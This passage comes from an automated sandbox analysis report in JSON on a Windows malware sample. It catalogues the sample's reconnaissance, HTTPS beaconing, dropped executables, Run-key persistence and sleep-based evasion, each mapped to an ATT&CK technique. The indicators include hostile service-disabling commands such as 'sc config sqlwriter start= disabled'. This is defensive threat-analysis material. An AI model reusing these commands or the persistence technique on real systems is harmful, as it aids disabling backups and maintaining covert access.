1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000043000000000074014300000000000600000000000000500143001a000000c00b4700000000001a000000000000001400000000000000000000000000000000000000000000000200000240a34600630400670000000000000000000000008000000000000000852a00afa8e446000100000000000000020000000c000000f09f4600f09f4600eb9f46000000000000000000000043000000000110f12c000000000030f72c0095e1c377e72e0700feffffff435cc7775059c77794000000a0000000ea9f4600e89f460094000000b4f22c00fdfe8377000000001800000003f4fe1b (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"IsWow64Process\" with parameter \"5932\" - (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300282646000f00010e9443000e63006f006e00660069006700750072006100740069006f006e00000055004200570053005c0041000b00000bee43000040a3460088bb45006f00630061006c005c00500072006f0067007200 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6c777cbdbec77f42e8771d0934500a03587711bdaec772ce72c0090744500b2f4c7772bdaec773ce72c0000008071000080710000000098e62c00f0000000f000807100000000a8e62c00530000003ce82c0000000000010000000ce72c0040f5c7770000000000000000f8e62c00 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c475874a8884c008c47587400000000a8884c0054de2c00086dc7771881cf770000000008df2c0000000000de54326594de2c0095e1c3770f2d0700feffffff6b2cc8773119ba7502100000000000000000010068de2c00c89fc7778c4758740000000000000000 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"553715551\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"335611914\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-4", "type": 17, "relevance": 5, "name": "Recently renewed or created SSL certificate", "description": "Newly renewed or created SSL certificate: \"vgmsite.com\" (0 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"vgmsite.com\" (89 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"DISMHOST.EXE.67AB4062.bin\" claimed CRC 103114 while the actual is CRC 3197197", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "details too long to display", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005932]\n \"DISMHOST.EXE.67AB4062.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\\\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"DISMHOST.EXE.67AB4062.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67AB4062.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" sleeping for \"1566804069\" milliseconds\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" sleeping for \"00600000\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": 